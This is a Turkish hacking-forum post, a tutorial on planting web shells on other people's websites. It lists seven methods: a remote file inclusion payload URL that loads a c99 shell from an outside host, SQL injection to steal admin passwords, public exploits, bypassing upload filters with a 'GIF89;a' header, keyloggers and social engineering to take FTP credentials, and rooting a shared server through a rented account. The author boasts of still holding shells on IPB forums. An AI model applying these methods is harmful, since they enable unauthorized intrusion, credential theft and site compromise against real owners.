Siteye Shell Sokma Tüm Yöntemleriyle (1 Viewer)

Joined
Feb 21, 2017
Credits
0
Rating - 0%
İşinizi Görduyse Ne Mutlu Bana :))

Code:
Shell Nasıl Atılır?

Aşamaları:
* Remote File Iclusion Açıklarından Faydalanabiliriz
* SQL Injection Açıklarından Faydalanabiliriz
* Exploits Kullanarak Yükleme Yapabiliriz
* Upload Açıklarından Faydalanabiliriz
* Logger vb Spy Yazılımlardan Faydalanabiliriz
* Hedef Sunucudan Hesap Açarak Yükleme Yapabiliriz
* Sosyal Mühendislik Kullanarak Yükleme Yapabiliriz

1) Remote File Inclusion Açıklarını Kullanarak .Txt Uzantılı Shellimizden Yukarıda Bahsetiğim Yetkiler Çerçevesinde (Permissionlar) İstediğimiz Gibi .Php Uzantılı Shell Yükleyebiliriz. veya Bağlandığımız .Txt Shell ile Yine Sunucu Yetkileri Çerçevesinde Alt Dizinlere Geçebiliriz yada İndeximizi Upload Eder Çıkarız.

Örnek:

http://www.Siteadresi.com/İndex.php?acık=Http://Siteadresi.com/c99.txt?

İle Bağlandığımız Siteye .php Uzantılı Shelli Upload Edersek Kullanımı Şu Şekilde Olur.

http://www.Siteadresi.com/c99.php
Şeklinde Kullanıma Geçebiliriz.

RFI Konusunu Artık Bilmeyen Yok Şuanda RFI Bitmesede Çok Nadir Rastlanan Açıklar Haline Deldi. Bu Yüzden Bütün Hakcing Bilgilerinizi RFI Açığına Bağlamayın.

2) SQL Injection Açığıyla Nasıl Shell Atacaz. Öncelikle SQL Açığını Kullanmasını Bilen Mantığı Hemen Anlar, Nedir Bu Mantık? SQL Kodları Yardımıyla Site Sahibinin Kullanıcı Adı ve Şifresini Elde Ediyoruz. Kimi Zaman MD5 Seklinde Şifre Gelir, Bizde MD5 Crackerler Yardımıyla Kırarız.

Elde Ettiğimiz Kullanıcı Adı ve Şifre İle Siteye Giriş Yaparız Admin Panelden Bir Upload Yeri Bulur Shell Dosyamızı (.php veya .asp) Upload Ederiz ve Yine Sunucuya Bağlanmış Oluruz.

SQL Şuanda Kullanılan Yaygın Hacking Yöntemlerinden Biridir. Çok Büyük Sitelerde Bile Rastlanan Hiç Değilse Her Serverde En Az 1 den Fazla Sitede Rastlanan Açıktır.
3) Exploits Kullanarak Shell Atabiliriz Buda Yine Derlenmiş Exploitler Sayesinde Sitenin Admin Bilgilerini (kullanıcı adı ve şifresini) Elde Ederek Admin Panelden Shell Upload Edebiliriz ve Yine Sunucuda Yetkilerimiz Dahilinde İşlem Yapabiliriz.

Buna Şöyle Bir Örnek Vereyim, Bir Dönem IPB Forumlarında Exploits Sayesinde Admin Şifrelerine Ulaşabiliyorduk. Hala Çoğu IPB Forumlarında Shellerim Bulunmakta.
4) Upload Açıklarından Faydalanarak Sitelere Shell Yükleyebiliriz. Burada Genellikle .php veya .asp Uzantılı Shellerimizi Kabul Etmeyen Upload Siteleriyle Karşılaşıyoruz. Bunun İçin Shell İçine GIF89;a Yazısını Ekleyerek Upload Sayfasının Yükleyeceğimiz Shelli Resim Dosyası Olarak Görmesini Sağlarız.
Aklınızın Almayacağı Kadar Çok Upload Dosyaları Vardır. Bunlardan En Çok Kullanılan Bir İki Tanesini Yazayım.

upload.php , upload.asp , upload.htm , upload.html
Bu Uzantıları ve Upload Sayfalarını Hayal Gücünüze Bağlı Çoğalta Bilirsiniz.
5) Hiç Tavsiye Etmediğim ve Hiç Kullanmadığım Ancak Buda Bir Hacking Yöntemi Olduğu İçin Açıklamak Zorunda Kaldığım Bir Yöntem. Logger vb Spy Yazılımlar Sayesinde Shell Nasıl Atılır? Öncelikle Hedef Sitemizin Adminini Buluyoruz Gerekli SM vb İşlemleri Gerçekleştirdikten Sonra Loggeri Yedirip Admin Şifreleride Dahil Olmak Üzere FTP ve Mail Şifrelerini Alırız. Aldığımız Şifreler Sayesinde Site Sahibinin Yetkilerini Almamıza Rağmen FTP Sine Girdiğimiz Sitenin Sunusunada Ulaşmak İstiyorsan Shell Upload Eder ve Yetkilerimiz Çerçevesinde İzinlerimizi Kullanarak Siteyi veya Serveri Hackleye Biliriz.
6) Bu Maddemizde İse Diyelimki Hedef bir Site var. Sitede Her Şeyi Yapmamıza Rağmen Bir Türlü Açık Bulamadık. Genelde Son Çare Olarak Kullanılan Bu Yöntemle Hostcuyla İrtibata Geçer SM Yaparak Sunucudan Bir Hesap Açarız Açtığımız Hesapta Göz Boyamak Adına Ufak Tefek Portallar Kurar ve FTP mize Shell Atarak Serveri Rootlar Hedef Siteye Ulaşırız veya Manuel Geçiler Yaparakda Hedef Siteye Ulaşabiliriz.
7) Sosyal Mühendislik Yöntemiyle Siteye Shell Yükleye Biliriz. Burada İşin İçine SM Girdiği İçin Belirli Bir Yöntem Yoktur. Ancak SM Yapan Kişinin Kabiliyetine Bağlıdır. Bir Kişi Sosyal Mühendislik Yapabilecek Kabiliyetteyse Çok Kolay ve Rahat Bir Şekilde Çeşitli Yollarla Siteye veya FTP ye Ulaşarak Shell Atabilir.
Shell Nasıl Atılır Maddemizde Burada Bitmiştir. Yukarıda Belirttiğim 7 Madde Çoğaltılabilir. Bu Konuda da Anlamadığınız veya Daha Detaylı Anlatmamı İstediğiniz Yerleri Konu Altına Belirtirseniz Farklı veya Daha Geniş Anlatımlar Yapabilirim.

Iyı Forumlar ..
 

Users who are viewing this thread

Top